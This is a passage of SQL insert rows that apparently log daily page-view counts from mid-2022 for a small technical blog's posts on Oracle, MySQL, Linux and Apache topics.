(2602,'/about-me/','page','2022-05-09',1,51),
(2603,'/','home','2022-05-10',28,365),
(2604,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-10',2,583),
(2605,'/connection-encryption-in-oracle-database/','post','2022-05-10',1,110),
(2606,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-10',1,56),
(2607,'/about-me/','page','2022-05-10',1,51),
(2608,'/','home','2022-05-11',29,365),
(2609,'/about-me/','page','2022-05-11',1,51),
(2610,'/connection-encryption-in-oracle-database/','post','2022-05-11',2,110),
(2611,'/','home','2022-05-12',49,365),
(2612,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-12',5,583),
(2613,'/about-me/','page','2022-05-12',1,51),
(2614,'/','home','2022-05-13',45,365),
(2615,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-13',2,583),
(2616,'/','home','2022-05-14',19,365),
(2617,'/about-me/','page','2022-05-14',2,51),
(2618,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-05-14',1,27),
(2619,'/','home','2022-05-15',14,365),
(2620,'/about-me/','page','2022-05-15',2,51),
(2621,'/','home','2022-05-16',22,365),
(2622,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-16',1,583),
(2623,'/connection-encryption-in-oracle-database/','post','2022-05-16',10,110),
(2624,'/about-me/','page','2022-05-16',1,51),
(2625,'/connection-encryption-in-oracle-database/','post','2022-05-17',2,110),
(2626,'/','home','2022-05-17',46,365),
(2627,'/about-me/','page','2022-05-17',1,51),
(2628,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-17',3,583),
(2629,'/','home','2022-05-18',35,365),
(2630,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-18',5,583),
(2631,'/connection-encryption-in-oracle-database/','post','2022-05-18',1,110),
(2632,'/','home','2022-05-19',65,365),
(2633,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-19',1,56),
(2634,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-19',10,583),
(2635,'/','home','2022-05-20',36,365),
(2636,'/about-me/','page','2022-05-20',1,51),
(2637,'/','home','2022-05-21',31,365),
(2638,'/connection-encryption-in-oracle-database/','post','2022-05-21',10,110),
(2639,'/about-me/','page','2022-05-21',1,51),
(2640,'/','home','2022-05-22',32,365),
(2641,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-22',2,583),
(2642,'/about-me/','page','2022-05-22',3,51),
(2643,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-22',2,56),
(2644,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-23',9,56),
(2645,'/','home','2022-05-23',35,365),
(2646,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-23',3,583),
(2647,'/about-me/','page','2022-05-23',1,51),
(2648,'/','home','2022-05-24',57,365),
(2649,'/connection-encryption-in-oracle-database/','post','2022-05-24',2,110),
(2650,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-05-24',2,150),
(2651,'/about-me/','page','2022-05-24',1,51),
(2652,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-05-24',1,312),
(2653,'/','home','2022-05-25',42,365),
(2654,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-25',4,583),
(2655,'/change-the-character-set-collation-of-a-table/','post','2022-05-25',2,68),
(2656,'/impdp-errors-ora-02374-ora-12899/','post','2022-05-25',1,56),
(2657,'/','home','2022-05-26',42,365),
(2658,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-26',1,583),
(2659,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-05-26',1,312),
(2660,'/','home','2022-05-27',36,365),
(2661,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-27',5,583),
(2662,'/','home','2022-05-28',43,365),
(2663,'/connection-encryption-in-oracle-database/','post','2022-05-28',11,110),
(2664,'/about-me/','page','2022-05-28',2,51),
(2665,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-28',2,583),
(2666,'/','home','2022-05-29',33,365),
(2667,'/connection-encryption-in-oracle-database/','post','2022-05-29',1,110),
(2668,'/','home','2022-05-30',23,365),
(2669,'/about-me/','page','2022-05-30',2,51),
(2670,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-30',1,583),
(2671,'/impdp-errors-ora-02374-ora-12899','post','2022-05-30',2,56),
(2672,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-05-31',2,583),
(2673,'/connection-encryption-in-oracle-database/','post','2022-05-31',4,110),
(2674,'/','home','2022-05-31',29,365),
(2675,'/about-me/','page','2022-05-31',1,51),
(2676,'/','home','2022-06-01',38,365),
(2677,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-06-01',1,312),
(2678,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-01',5,56),
(2679,'/about-me/','page','2022-06-01',1,51),
(2680,'/','home','2022-06-02',29,365),
(2681,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-02',7,56),
(2682,'/','home','2022-06-03',34,365),
(2683,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-03',13,56),
(2684,'/about-me/','page','2022-06-03',2,51),
(2685,'/','home','2022-06-04',50,365),
(2686,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-04',9,56),
(2687,'/connection-encryption-in-oracle-database/','post','2022-06-04',8,110),
(2688,'/','home','2022-06-05',39,365),
(2689,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-05',4,56),
(2690,'/about-me/','page','2022-06-05',2,51),
(2691,'/impdp-errors-ora-02374-ora-12899','post','2022-06-06',7,56),
(2692,'/','home','2022-06-06',34,365),
(2693,'/connection-encryption-in-oracle-database/','post','2022-06-06',2,110),
(2694,'/about-me/','page','2022-06-06',3,51),
(2695,'/','home','2022-06-07',40,365),
(2696,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-07',8,56),
(2697,'/','home','2022-06-08',42,365),
(2698,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-08',11,56),
(2699,'/about-me/','page','2022-06-08',2,51),
(2700,'/how-to-make-apache-web-server-more-secure/','post','2022-06-08',1,305),
(2701,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-06-08',1,312),
(2702,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-06-08',1,104),
(2703,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-06-08',1,97),
(2704,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-06-08',1,60),
(2705,'/change-the-character-set-collation-of-a-table/','post','2022-06-08',1,68),
(2706,'/','home','2022-06-09',42,365),
(2707,'/impdp-errors-ora-02374-ora-12899','post','2022-06-09',6,56),
(2708,'/connection-encryption-in-oracle-database/','post','2022-06-09',3,110),
(2709,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-10',13,56),
(2710,'/','home','2022-06-10',42,365),
(2711,'/about-me/','page','2022-06-10',1,51),
(2712,'/','home','2022-06-11',37,365),
(2713,'/about-me/','page','2022-06-11',2,51),
(2714,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-11',26,56),
(2715,'/impdp-errors-ora-02374-ora-12899','post','2022-06-12',72,56),
(2716,'/','home','2022-06-12',49,365),
(2717,'/','home','2022-06-13',46,365),
(2718,'/impdp-errors-ora-02374-ora-12899','post','2022-06-13',33,56),
(2719,'/about-me/','page','2022-06-13',2,51),
(2720,'/hosting-a-podcast/','post','2022-06-13',1,329),
(2721,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-06-13',1,150),
(2722,'/how-to-make-apache-web-server-more-secure/','post','2022-06-13',1,305),
(2723,'/connection-encryption-in-oracle-database/','post','2022-06-13',7,110),
(2724,'/backup-restore-progress/','post','2022-06-13',1,64),
(2725,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-06-13',1,27),
(2726,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-14',10,56),
(2727,'/','home','2022-06-14',33,365),
(2728,'/connection-encryption-in-oracle-database/','post','2022-06-14',2,110),
(2729,'/about-me/','page','2022-06-14',3,51),
(2730,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-06-14',1,56),
(2731,'/?p=56','post','2022-06-15',13,56),
(2732,'/cart/','page','2022-06-15',1,320),
(2733,'/','home','2022-06-15',28,365),
(2734,'/about-me/','page','2022-06-15',1,51),
(2735,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-16',16,56),
(2736,'/','home','2022-06-16',49,365),
(2737,'/about-me/','page','2022-06-16',4,51),
(2738,'/','home','2022-06-17',54,365),
(2739,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-17',13,56),
(2740,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-06-17',1,56),
(2741,'/cart/','page','2022-06-17',1,320),
(2742,'/about-me/','page','2022-06-17',1,51),
(2743,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-18',10,56),
(2744,'/','home','2022-06-18',23,365),
(2745,'/about-me/','page','2022-06-18',2,51),
(2746,'/connection-encryption-in-oracle-database/','post','2022-06-18',2,110),
(2747,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-19',10,56),
(2748,'/','home','2022-06-19',22,365),
(2749,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-06-19',1,583),
(2750,'/about-me/','page','2022-06-19',1,51),
(2751,'/connection-encryption-in-oracle-database/','post','2022-06-19',2,110),
(2752,'/','home','2022-06-20',25,365),
(2753,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-20',10,56),
(2754,'/about-me/','page','2022-06-20',2,51),
(2755,'/','home','2022-06-21',38,365),
(2756,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-21',10,56),
(2757,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-06-21',1,60),
(2758,'/about-me/','page','2022-06-21',8,51),
(2759,'/','home','2022-06-22',31,365),
(2760,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-22',7,56),
(2761,'/connection-encryption-in-oracle-database/','post','2022-06-22',6,110),
(2762,'/about-me/','page','2022-06-22',1,51),
(2763,'/impdp-errors-ora-02374-ora-12899','post','2022-06-23',10,56),
(2764,'/','home','2022-06-23',34,365),
(2765,'/connection-encryption-in-oracle-database/','post','2022-06-23',3,110),
(2766,'/about-me/','page','2022-06-23',1,51),
(2767,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-24',10,56),
(2768,'/','home','2022-06-24',33,365),
(2769,'/connection-encryption-in-oracle-database/','post','2022-06-24',4,110),
(2770,'/about-me/','page','2022-06-24',1,51),
(2771,'/','home','2022-06-25',32,365),
(2772,'/about-me/','page','2022-06-25',3,51),
(2773,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-25',8,56),
(2774,'/impdp-errors-ora-02374-ora-12899','post','2022-06-26',11,56),
(2775,'/','home','2022-06-26',36,365),
(2776,'/about-me/','page','2022-06-26',1,51),
(2777,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-06-26',1,56),
(2778,'/sudo-without-password/','post','2022-06-26',1,603),
(2779,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-06-26',1,583),
(2780,'/connection-encryption-in-oracle-database/','post','2022-06-27',1,110),
(2781,'/','home','2022-06-27',26,365),
(2782,'/impdp-errors-ora-02374-ora-12899','post','2022-06-27',7,56),
(2783,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-28',10,56),
(2784,'/','home','2022-06-28',39,365),
(2785,'/connection-encryption-in-oracle-database/','post','2022-06-28',2,110),
(2786,'/about-me/','page','2022-06-28',1,51),
(2787,'/','home','2022-06-29',35,365),
(2788,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-29',12,56),
(2789,'/about-me/','page','2022-06-29',1,51),
(2790,'/','home','2022-06-30',40,365),
(2791,'/impdp-errors-ora-02374-ora-12899/','post','2022-06-30',10,56),
(2792,'/connection-encryption-in-oracle-database/','post','2022-06-30',4,110),
(2793,'/connection-encryption-in-oracle-database/','post','2022-07-01',6,110),
(2794,'/','home','2022-07-01',32,365),
(2795,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-01',8,56),
(2796,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2022-07-01',1,583),
(2797,'/backup-restore-progress/feed/','feed','2022-07-01',1,64),
(2798,'/change-the-character-set-collation-of-a-table/feed/','feed','2022-07-01',1,68),
(2799,'/about-me/','page','2022-07-01',1,51),
(2800,'/impdp-errors-ora-02374-ora-12899','post','2022-07-02',10,56),
(2801,'/','home','2022-07-02',35,365),
(2802,'/about-me/','page','2022-07-02',1,51),
(2803,'/?p=60','post','2022-07-02',1,60),
(2804,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2022-07-02',1,60),
(2805,'/','home','2022-07-03',23,365),
(2806,'/impdp-errors-ora-02374-ora-12899','post','2022-07-03',10,56),
(2807,'/','home','2022-07-04',31,365),
(2808,'/impdp-errors-ora-02374-ora-12899','post','2022-07-04',9,56),
(2809,'/connection-encryption-in-oracle-database/','post','2022-07-04',2,110),
(2810,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-07-04',1,66),
(2811,'/','home','2022-07-05',32,365),
(2812,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-05',10,56),
(2813,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-06',11,56),
(2814,'/','home','2022-07-06',20,365),
(2815,'/connection-encryption-in-oracle-database/feed/','feed','2022-07-06',1,110),
(2816,'/how-to-make-apache-web-server-more-secure/feed/','feed','2022-07-06',1,305),
(2817,'/?p=305','post','2022-07-06',1,305),
(2818,'/?p=110','post','2022-07-06',1,110),
(2819,'/','home','2022-07-07',38,365),
(2820,'/connection-encryption-in-oracle-database/','post','2022-07-07',10,110),
(2821,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-07',9,56),
(2822,'//blog/database-startup-error-fatal-ni-connect-error-12547/','post','2022-07-07',4,60),
(2823,'/about-me/','page','2022-07-07',1,51),
(2824,'/','home','2022-07-08',40,365),
(2825,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-08',8,56),
(2826,'/connection-encryption-in-oracle-database/','post','2022-07-08',2,110),
(2827,'/','home','2022-07-09',44,365),
(2828,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-09',8,56),
(2829,'/about-me/','page','2022-07-09',1,51),
(2830,'/','home','2022-07-10',28,365),
(2831,'/impdp-errors-ora-02374-ora-12899','post','2022-07-10',8,56),
(2832,'/about-me/','page','2022-07-10',2,51),
(2833,'/','home','2022-07-11',37,365),
(2834,'/impdp-errors-ora-02374-ora-12899','post','2022-07-11',10,56),
(2835,'/connection-encryption-in-oracle-database/','post','2022-07-12',9,110),
(2836,'/','home','2022-07-12',42,365),
(2837,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-12',13,56),
(2838,'/about-me/','page','2022-07-12',1,51),
(2839,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-07-12',1,60),
(2840,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-07-12',1,56),
(2841,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-07-12',1,27),
(2842,'/','home','2022-07-13',29,365),
(2843,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-13',8,56),
(2844,'/about-me/','page','2022-07-13',2,51),
(2845,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-07-13',1,60),
(2846,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-07-13',1,27),
(2847,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-07-13',1,56),
(2848,'/connection-encryption-in-oracle-database/','post','2022-07-13',2,110),
(2849,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-14',10,56),
(2850,'/','home','2022-07-14',38,365),
(2851,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-07-14',1,583),
(2852,'/connection-encryption-in-oracle-database/','post','2022-07-14',3,110),
(2853,'/impdp-errors-ora-02374-ora-12899','post','2022-07-15',8,56),
(2854,'/','home','2022-07-15',36,365),
(2855,'/about-me/','page','2022-07-15',2,51),
(2856,'/','home','2022-07-16',37,365),
(2857,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-16',11,56),
(2858,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-17',8,56),
(2859,'/','home','2022-07-17',29,365),
(2860,'/about-me/','page','2022-07-17',1,51),
(2861,'/how-to-make-apache-web-server-more-secure/','post','2022-07-17',1,305),
(2862,'/connection-encryption-in-oracle-database/','post','2022-07-17',10,110),
(2863,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-07-17',1,97),
(2864,'/change-the-character-set-collation-of-a-table/','post','2022-07-17',1,68),
(2865,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-18',9,56),
(2866,'/','home','2022-07-18',28,365),
(2867,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-07-18',1,583),
(2868,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-07-18',1,150),
(2869,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-07-18',1,312),
(2870,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-07-18',1,104),
(2871,'/backup-restore-progress/','post','2022-07-18',1,64),
(2872,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-07-18',1,27),
(2873,'/connection-encryption-in-oracle-database/','post','2022-07-18',2,110),
(2874,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-19',11,56),
(2875,'/','home','2022-07-19',39,365),
(2876,'/about-me/','page','2022-07-19',2,51),
(2877,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-20',10,56),
(2878,'/connection-encryption-in-oracle-database/','post','2022-07-20',2,110),
(2879,'/','home','2022-07-20',38,365),
(2880,'/','home','2022-07-21',40,365),
(2881,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-21',8,56),
(2882,'/','home','2022-07-22',26,365),
(2883,'/impdp-errors-ora-02374-ora-12899','post','2022-07-22',8,56),
(2884,'/','home','2022-07-23',14,365),
(2885,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-23',11,56),
(2886,'/connection-encryption-in-oracle-database/','post','2022-07-23',9,110),
(2887,'/about-me/','page','2022-07-23',1,51),
(2888,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-24',9,56),
(2889,'/','home','2022-07-24',20,365),
(2890,'/connection-encryption-in-oracle-database/','post','2022-07-24',4,110),
(2891,'/','home','2022-07-25',26,365),
(2892,'/impdp-errors-ora-02374-ora-12899','post','2022-07-25',8,56),
(2893,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-07-25',1,60),
(2894,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-07-25',1,66),
(2895,'/about-me/','page','2022-07-25',2,51),
(2896,'/impdp-errors-ora-02374-ora-12899','post','2022-07-26',8,56),
(2897,'/','home','2022-07-26',22,365),
(2898,'/','home','2022-07-27',32,365),
(2899,'/impdp-errors-ora-02374-ora-12899','post','2022-07-27',7,56),
(2900,'/connection-encryption-in-oracle-database/','post','2022-07-27',3,110),
(2901,'/','home','2022-07-28',22,365),
(2902,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-28',7,56),
(2903,'/about-me/','page','2022-07-28',1,51),
(2904,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-29',9,56),
(2905,'/','home','2022-07-29',25,365),
(2906,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-30',8,56),
(2907,'/connection-encryption-in-oracle-database/','post','2022-07-30',5,110),
(2908,'/connection-encryption-in-oracle-database/feed/','feed','2022-07-30',5,110),
(2909,'/','home','2022-07-30',23,365),
(2910,'/impdp-errors-ora-02374-ora-12899/','post','2022-07-31',11,56),
(2911,'/','home','2022-07-31',20,365),
(2912,'/connection-encryption-in-oracle-database/','post','2022-07-31',2,110),
(2913,'/about-me/','page','2022-07-31',1,51),
(2914,'/how-to-make-apache-web-server-more-secure/','post','2022-07-31',1,305),
(2915,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-07-31',1,150),
(2916,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-07-31',1,104),
(2917,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-07-31',1,27),
(2918,'/sudo-without-password/','post','2022-07-31',1,603),
(2919,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-07-31',1,583),
(2920,'/','home','2022-08-01',21,365),
(2921,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-01',7,56),
(2922,'/about-me/','page','2022-08-01',1,51),
(2923,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-08-01',1,60),
(2924,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-01',1,583),
(2925,'/connection-encryption-in-oracle-database/','post','2022-08-01',1,110),
(2926,'/','home','2022-08-02',41,365),
(2927,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-02',8,56),
(2928,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-02',1,583),
(2929,'/','home','2022-08-03',37,365),
(2930,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-03',9,56),
(2931,'/connection-encryption-in-oracle-database/','post','2022-08-04',1,110),
(2932,'/connection-encryption-in-oracle-database/feed/','feed','2022-08-04',1,110),
(2933,'/','home','2022-08-04',32,365),
(2934,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-04',8,56),
(2935,'/','home','2022-08-05',41,365),
(2936,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-05',7,56),
(2937,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-06',9,56),
(2938,'/','home','2022-08-06',19,365),
(2939,'/connection-encryption-in-oracle-database/','post','2022-08-06',5,110),
(2940,'/connection-encryption-in-oracle-database/feed/','feed','2022-08-06',5,110),
(2941,'/','home','2022-08-07',20,365),
(2942,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-07',8,56),
(2943,'/impdp-errors-ora-02374-ora-12899','post','2022-08-08',7,56),
(2944,'/','home','2022-08-08',35,365),
(2945,'/impdp-errors-ora-02374-ora-12899','post','2022-08-09',10,56),
(2946,'/','home','2022-08-09',39,365),
(2947,'//blog/database-startup-error-fatal-ni-connect-error-12547/','post','2022-08-09',5,60),
(2948,'/about-me/','page','2022-08-09',2,51),
(2949,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-09',1,583),
(2950,'/connection-encryption-in-oracle-database/','post','2022-08-09',1,110),
(2951,'/','home','2022-08-10',28,365),
(2952,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-10',12,56),
(2953,'/about-me/','page','2022-08-10',4,51),
(2954,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-08-10',2,60),
(2955,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-10',1,583),
(2956,'/connection-encryption-in-oracle-database/','post','2022-08-10',3,110),
(2957,'/how-to-make-apache-web-server-more-secure/','post','2022-08-10',2,305),
(2958,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-08-10',2,312),
(2959,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-08-10',2,104),
(2960,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-08-10',2,97),
(2961,'/backup-restore-progress/','post','2022-08-10',1,64),
(2962,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-08-10',1,66),
(2963,'/change-the-character-set-collation-of-a-table/','post','2022-08-10',1,68),
(2964,'/','home','2022-08-11',37,365),
(2965,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-11',11,56),
(2966,'/about-me/','page','2022-08-11',2,51),
(2967,'/how-to-make-apache-web-server-more-secure/','post','2022-08-11',2,305),
(2968,'/fedora-33-problem-with-broadcom-wifi-device/','post','2022-08-11',1,312),
(2969,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-08-11',1,104),
(2970,'/connection-encryption-in-oracle-database/','post','2022-08-11',1,110),
(2971,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-08-11',1,97),
(2972,'/database-startup-error-fatal-ni-connect-error-12547/','post','2022-08-11',1,60),
(2973,'/backup-restore-progress/','post','2022-08-11',1,64),
(2974,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2022-08-11',1,27),
(2975,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2022-08-11',1,150),
(2976,'/hosting-a-podcast/','post','2022-08-11',1,329),
(2977,'/how-to-make-apache-web-server-more-secure/feed/','feed','2022-08-11',1,305),
(2978,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2022-08-11',1,60),
(2979,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2022-08-11',1,56),
(2980,'/connection-encryption-in-oracle-database/feed/','feed','2022-08-12',1,110),
(2981,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-12',9,56),
(2982,'/','home','2022-08-12',35,365),
(2983,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2022-08-12',1,97),
(2984,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2022-08-12',1,312),
(2985,'/backup-restore-progress/feed/','feed','2022-08-12',1,64),
(2986,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/feed/','feed','2022-08-12',1,104),
(2987,'/one-way-to-prevent-ddos-attacks-in-wordpress/feed/','feed','2022-08-12',1,150),
(2988,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/feed/','feed','2022-08-12',1,27),
(2989,'/hosting-a-podcast/feed/','feed','2022-08-12',1,329),
(2990,'/impdp-errors-ora-02374-ora-12899','post','2022-08-13',10,56),
(2991,'/','home','2022-08-13',28,365),
(2992,'/backup-restore-progress/feed/','feed','2022-08-13',1,64),
(2993,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2022-08-13',1,66),
(2994,'/about-me/','page','2022-08-13',1,51),
(2995,'/','home','2022-08-14',34,365),
(2996,'/impdp-errors-ora-02374-ora-12899','post','2022-08-14',9,56),
(2997,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-15',11,56),
(2998,'/','home','2022-08-15',22,365),
(2999,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-08-15',1,97),
(3000,'/','home','2022-08-16',45,365),
(3001,'/impdp-errors-ora-02374-ora-12899','post','2022-08-16',10,56),
(3002,'/impdp-errors-ora-02374-ora-12899','post','2022-08-17',12,56),
(3003,'/','home','2022-08-17',30,365),
(3004,'/about-me/','page','2022-08-17',1,51),
(3005,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-17',1,583),
(3006,'/add-new-disk-to-redhat-based-linux-without-reboot','post','2022-08-17',2,97),
(3007,'/','home','2022-08-18',36,365),
(3008,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-18',11,56),
(3009,'/change-the-character-set-collation-of-a-table/','post','2022-08-18',1,68),
(3010,'/','home','2022-08-19',35,365),
(3011,'/about-me/','page','2022-08-19',1,51),
(3012,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-19',7,56),
(3013,'/change-the-character-set-collation-of-a-table/','post','2022-08-19',1,68),
(3014,'/add-new-disk-to-redhat-based-linux-without-reboot','post','2022-08-19',2,97),
(3015,'/change-the-character-set-collation-of-a-table/feed/','feed','2022-08-19',2,68),
(3016,'/impdp-errors-ora-02374-ora-12899','post','2022-08-20',9,56),
(3017,'/','home','2022-08-20',31,365),
(3018,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2022-08-20',1,66),
(3019,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-21',12,56),
(3020,'/','home','2022-08-21',32,365),
(3021,'/','home','2022-08-22',39,365),
(3022,'/about-me/','page','2022-08-22',1,51),
(3023,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-22',8,56),
(3024,'/','home','2022-08-23',30,365),
(3025,'/impdp-errors-ora-02374-ora-12899','post','2022-08-23',11,56),
(3026,'/connection-encryption-in-oracle-database/','post','2022-08-23',1,110),
(3027,'/connection-encryption-in-oracle-database/feed/','feed','2022-08-23',1,110),
(3028,'/','home','2022-08-24',23,365),
(3029,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-24',6,56),
(3030,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-08-24',1,583),
(3031,'/sudo-without-password/','post','2022-08-24',1,603),
(3032,'/impdp-errors-ora-02374-ora-12899/','post','2022-08-25',9,56),
(3033,'/','home','2022-08-25',36,365),
(3034,'/','home','2022-08-26',30,365),
(3035,'/impdp-errors-ora-02374-ora-12899','post','2022-08-26',8,56),
(3036,'/impdp-errors-ora-02374-ora-12899','post','2022-08-27',12,56),
